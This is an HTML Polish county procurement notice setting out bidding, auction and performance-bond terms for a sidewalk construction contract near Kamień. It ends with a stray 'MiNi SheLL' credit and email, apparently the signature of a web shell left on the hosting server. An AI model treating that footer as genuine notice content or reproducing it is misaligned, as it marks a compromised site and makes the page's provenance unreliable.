Dopuszcza się możliwość złożenia oferty wspólnej przez dwóch lub więcej wykonawców w rozumieniu art. 23 ustawy. W przypadku złożenia oferty wspólnej każdy z wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1  oraz brak podstaw do wykluczenia wskazanych  w art. 24 ustawy. Wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Wykonawcy mogą spełniać wspólnie. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu i zawarcia umowy   w sprawie zamówienia publicznego. Dokumenty należy złożyć w formie oryginału lub kopii poświadczonej za zgodność  z oryginałem przez Wykonawcę bądź upoważnionego przedstawiciela Wykonawcy, zgodnie z treścią dokumentu określającego status Wykonawcy bądź treścią załączonego do oferty pełnomocnictwa.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> licytacja elektroniczna.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje zmiany istotnych postanowień  zawartej umowy  w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy. Zamawiający dopuszcza możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty w zakresie:
1)terminu realizacji umowy gdy jest ona spowodowana:
a)warunkami atmosferycznymi uniemożliwiającymi wykonywanie robót (przez warunki atmosferyczne uniemożliwiające wykonywanie robót należy rozumieć warunki atmosferyczne w znaczny sposób odbiegające od warunków zwykle panujących o tej samej porze roku na terenie realizowania robót,
b)epidemią stwierdzoną przez uprawnione do tego organy,
c)siłą wyższą, 
d)wadami dokumentacji projektowej uniemożliwiającymi prawidłowe wykonanie przedmiotu umowy zgodnie z zasadami sztuki budowlanej i skutkującymi przerwą w realizacji robót budowlanych.
2)zmiany osób przewidzianych do realizacji zamówienia przez strony w przypadku zdarzeń takich jak: śmierć, choroba, ustanie stosunku pracy, zmiana zakresu obowiązków pod warunkiem, że zaproponowane osoby będą miały kwalifikacje nie niższe od osób wskazanych w umowie.
Zmiany umowy wymagają zgody Zamawiającego i Wykonawcy w formie sporządzonego na piśmie i podpisanego przez strony aneksu. Poza przypadkami wymienionymi wyżej Zamawiający nie przewiduje zmiany innych istotnych postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>

<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.4.6) Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:</b> https://licytacje.uzp.gov.pl</p>
<p><b>IV.4.7) Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:</b> bip.powiat.chelm.pl</p>
<p><b>IV.4.8) Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:</b> 1.Wykonawcy dopuszczeni do udziału w licytacji elektronicznej zostaną zaproszeni do składania ofert, a ich dane zostaną przesłane do Urzędu Zamówień Publicznych na platformę do prowadzenia licytacji elektronicznych znajdującą się pod adresem https://licytacje.uzp.gov.pl. 
2.Korzystanie z oprogramowania jest bezpłatne. Jedynym warunkiem jest zarejestrowanie się  w systemie jako Wykonawca. Wykonawca, aby umożliwić Zamawiającemu dopuszczenie go do udziału  w licytacji, winien zarejestrować się w tym systemie przed wysłaniem wniosku o dopuszczenie do udziału w  licytacji, a wraz z wnioskiem winien przekazać Zamawiającemu informację o swoim loginie (identyfikatorze).
3.Pomoc w sposobie rejestracji  i odpowiedzi na ewentualne problemy znajdują się w Menu na głównej stronie platformy licytacji w zakładce Samouczek.
4.Wymagania techniczne: Komputer PC (lub równoważny) z systemem operacyjnym Windows/Linux oraz  podłączony do sieci Internet. Zainstalowana przeglądarka: MS Internet Explorer w wersji 6.0 lub wyższej albo Mozilla Firefox w wersji 2.0 lub wyższej..</p>
<p><b>IV.4.9) Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:</b> 1.Zamawiający udzieli zamówienia Wykonawcy, który zaoferuje najniższą cenę brutto.
2.W toku licytacji elektronicznej Wykonawcy składają kolejne  korzystniejsze postąpienia. Możliwość złożenia postąpienia istnieje od otwarcia licytacji do jej zamknięcia.
3.Oferta złożona w toku licytacji przestaje wiązać gdy inny Wykonawca złożył ofertę korzystniejszą.
4.W toku licytacji Wykonawcy proponują rzeczywistą cenę oferty brutto wyrażoną w złotych oraz ewentualnie w groszach (grosze należy oddzielić od złotych kropką).
5.Oferta złożona przez Wykonawcę winna być niższa od oferty najkorzystniejszej co najmniej o kwotę minimalnego postąpienia.
6.Jedno postąpienie (minimalna różnica między kolejnymi ofertami) wynosi 15 000,00 zł brutto (słownie: piętnaście tysięcy złotych). 
7.Licytacja elektroniczna rozpoczyna się od ceny wywoławczej 583 000,00 zł brutto (słownie: pięćset osiemdziesiąt trzy tysiące złotych). 
8.W toku licytacji Zamawiający za pośrednictwem platformy licytacyjnej na bieżąco będzie przekazywał wszystkim Wykonawcom  informacje o pozycji złożonych przez nich ofert, liczbie Wykonawców biorących udział w licytacji elektronicznej, a także o cenach złożonych ofert, z tym, że do momentu zamknięcia licytacji nie ujawni informacji umożliwiających identyfikację Wykonawców..</p>
<p><b>IV.4.10) Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania:</b><br>
<ul class="kh_indent_1"><li><table><tr><td style="font-size: 10pt;"><b>Licytacja jednoetapowa </b>          </td><td></td><td style="font-size: 10pt;"><b>czas trwania:</b> po upływie 15 minut od czasu ostatniego postąpienia w przypadku braku kolejnych ofert</td></tr>
</table></li></ul>

<p><b>IV.4.11) Termin składania wniosków o dopuszczenie do udziału w licytacji elektronicznej:</b> 28.02.2014 godzina 10:00, miejsce: Starostwo Powiatowe w Chełmie
Plac Niepodległości 1
22-100 Chełm
I piętro, pokój Nr 127.</p>
<p><b>IV.4.12) Termin otwarcia licytacji elektronicznej:</b> Otwarcie licytacji elektronicznej nastąpi nie wcześniej niż 5 dni  od dnia przekazania zaproszenia do udziału w licytacji. Dokładna data i godzina zostaną podane w zaproszeniu.</p>
<p><b>IV.4.13) Termin i warunki zamknięcia licytacji elektronicznej </b><i>(jeżeli dotyczy):</i></p>
<p>Zamknięcie licytacji elektronicznej nastąpi po upływie 15 minut od czasu ostatniego postąpienia w przypadku braku kolejnych ofert</p>
<p><b>IV.4.14 Wymagania dotyczące zabezpieczenia należytego wykonania umowy </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>1.Wykonawca przed podpisaniem umowy zobowiązany jest stosownie do postanowień art.150 ust. 1 i 2 ustawy do wniesienia zabezpieczenia należytego wykonania umowy na sumę stanowiącą 10 % zaoferowanej ceny (z VAT).
2.Zabezpieczenie służy pokryciu roszczeń z tytułu  niewykonania lub nienależytego wykonania umowy. 
3.Wykonawca w złożonej ofercie określa formę w jakiej wniesie zabezpieczenie należytego wykonania umowy.
4.Forma zabezpieczenia musi być zgodna z przepisami ustawy, tj. art. 148 ust 1 ustawy. 
5.Zabezpieczenia wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy Zamawiającego  PKO BP SA O / Chełm Nr 25 1020 1563 0000 5902 0013 7349  z dopiskiem zabezpieczenie należytego wykonania umowy -  Budowa chodnika w miejscowościach Strachosław, Kamień, Kamień Kolonia w ciągu drogi powiatowej Nr 1842L- etap III, gmina Kamień
6.Zabezpieczenie należytego wykonania umowy zwrócone będzie zgodnie z postanowieniami art. 151 ustawy.
7.Wykonawcy występujący wspólnie ponoszą solidarną odpowiedzialność za wykonanie umowy i wniesienie zabezpieczenia należytego wykonania umowy(art. 141 ustawy)</p>
<p><b>IV.4.15 Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego </b><i>(dotyczy licytacji elektronicznej):</i></p>
<p>Istotne dla stron postanowienia  umowy zawarte są w projekcie umowy będącej załącznikiem do niniejszego ogłoszenia zamieszczonej na stronie internetowej Zamawiającego.</p>
<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1.Wniosek wraz z załącznikami należy umieścić w zamkniętym opakowaniu uniemożliwiającym odczytanie zawartości bez uszkodzenia tego opakowania. 
2.Wniosek składa się w formie pisemnej. 
3.Wniosek i jego załączniki muszą być opieczętowane pieczątką imienną i podpisane  lub podpisane czytelnie przez osoby uprawnione do reprezentowania Wykonawcy..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com